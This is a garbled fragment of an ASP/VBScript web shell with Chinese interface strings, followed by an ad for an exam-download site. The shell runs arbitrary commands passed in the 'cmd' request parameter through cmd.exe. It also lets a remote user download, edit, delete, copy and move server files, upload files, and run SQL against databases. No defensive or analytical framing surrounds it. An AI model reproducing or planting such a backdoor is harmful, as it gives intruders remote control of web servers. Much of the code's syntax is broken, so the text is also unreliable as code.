



```

"Content-Disposition", "attachment. filename="
UNameBackUrlResponse.Write SIShowErr()Response.End End If
SI="" SI=SI"" SI=SI"" SI=SI"" Response.Write SIEnd
FunctionFunction CmdShell() If Request("SP")"" Then:ShellPath =
Request("SP"):Else:ShellPath = "cmd.exe":End If If
Request("cmd")"" Then DefCmd = Request("cmd") SI=""
SI=SICreateObject(ObT(1,0)).exec(ShellPathDefCmd).stdout.read
all SI=SIChr(13)"Rar命令行压缩示例
: c:\progra~1\winrar\rar.exe a d:\web\test\web1.rar
d:\web\test\web1" SI=SI Path) Set C = Nothing If Err.number=0
Then SI = SI "建立成功!" End If SI=SIPathPathSet C=NothingElse
Set FSO=CreateObject(ObT(0,1)) If FSO.FileExists(Path) Then Set
C=CreateObject(ObT(3,0)) C.CompactDatabase
"Provider=Microsoft.Jet.OLEDB.4.0.Data
Source="",Provider=Microsoft.Jet.OLEDB.4.0.Data Source="
"_bak"Set C=Nothing FSO.DeleteFile PathFSO.MoveFile
PathPathPathBackUrl Response.Write SIEnd FunctionFunction
DbManager() SqlStr=Trim(Request.Form("SqlStr"))
DbStr=Request.Form("DbStr") SI=SI"" SI=SI"" SI=SI"MsSql连
接MySql连接DSN连接" SI=SI"删除数据修改数据建数据表"
SI=SI"完全显示" SI=SI" SQL操作命令:" SI=SI"" SI=SI"表名"
Rs.MoveFirst Do While Not Rs.Eof If
Rs("TABLE_TYPE")="TABLE" then
TName=Rs("TABLE_NAME") SI=SI"" End If Rs.MoveNext Loop
Set Rs=Nothing SI=SI"执行语句 : "" For n=0 to FN-1 Set
Fld=Rs.Fields.Item(n) SI=SIFld.Name"" Do While Not(Rs.Eof or

```

```
Rs.Bof) And Count>0 Count=Count-1 Bgcolor="#EFEFEF"
SI=SI"" Next SI=SI"记录数 : "" 页码 : ""/" 首页 上一页 " If
Page>8 Then:Sp=Page-8:Else:Sp=1:End if For i=Sp To Sp 8 If i>PN
Then Exit For If i=Page Then SI=SI" " Else SI=SIi" 下一页 尾页"
End If SI=SI"SQL语句 : "" , "" " SI=SI"本地磁盘 ("":)"
SI=SIFileType)>0 then Ico = FileType""SI=SI" "" SI=SI"
copy""SI=SI"" Next SI=SI"" SI=SIFileIco(L.Name)SI=SIL.Name""""
SI=SIcng(L.size/1024)"""" SI=SI"del""SI=SI"move"
SI=SIPathBackUrl Response.Write SIEnd If End Function Function
EditFile(Path) If Request("Action2")="Post" Then Set
T=CF.CreateTextFile(Path) T.WriteLine Request.form("content")
T.close Set T=nothing SI="文件保存成功！ "
SI=SI"\newfile.asp":Txt="新建文件" End If SI="" SI=SI"" SI=SI""""
SI=SI"" Response.Write SI End Function Function CopyFile(Path)
Path = Split(Path,"|") If CF.FileExists(Path(0)) and Path(1)"" Then
CF.CopyFile Path(0),Path(1) SI="文件""复制成功！ "
SI=SIPath(0)BackUrl Response.Write SI End If End Function
Function DelFolder(Path) If CF.FolderExists(Path) Then
CF.DeleteFolder Path SI="目录""删除成功！ "
SI=SIPath(0)BackUrl Response.Write SIEnd If End Function
Function MoveFolder(Path) Path = Split(Path,"|") If
CF.FolderExists(Path(0)) and Path(1)"" Then CF.MoveFolder
Path(0),Path(1) SI="目录""移动成功！ " SI=SIPathBackUrl
Response.Write SIEnd If End FunctionEnd ClassSelect Case Action
Case "MainMenu":MainMenu() Case "ShowFile" Set ABC=New
LBF:ABC.ShowFile(Session("FolderPath")):Set ABC=Nothing Case
```

```
"DownFile":DownFile FName:ShowErr() Case "DelFile" Set
ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing Case
"EditFile" Set ABC=New LBF:ABC.EditFile(FName):Set
ABC=Nothing Case "CopyFile" Set ABC=New
LBF:ABC.CopyFile(FName):Set ABC=Nothing Case "MoveFile"
Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
Case "DelFolder" Set ABC=New LBF:ABC.DelFolder(FName):Set
ABC=Nothing Case "CopyFolder" Set ABC=New
LBF:ABC.CopyFolder(FName):Set ABC=Nothing Case
"MoveFolder" Set ABC=New LBF:ABC.MoveFolder(FName):Set
ABC=Nothing Case "NewFolder" Set ABC=New
LBF:ABC.NewFolder(FName):Set ABC=Nothing Case
"UpFile":UpFile() Case
"Logout":Session.Contents.Remove("GXGL"):Response.Redirect
URL Case "CmdShell":CmdShell() Case "CreateMdb":CreateMdb
FName Case "CompactMdb":CompactMdb FName Case
"DbManager":DbManager() Case "ServerInfo":ServerInfo() Case
Else MainForm()End SelectShowErr()%> 100Test 下载频道开通
, 各类考试题目直接下载。详细请访问 www.100test.com
```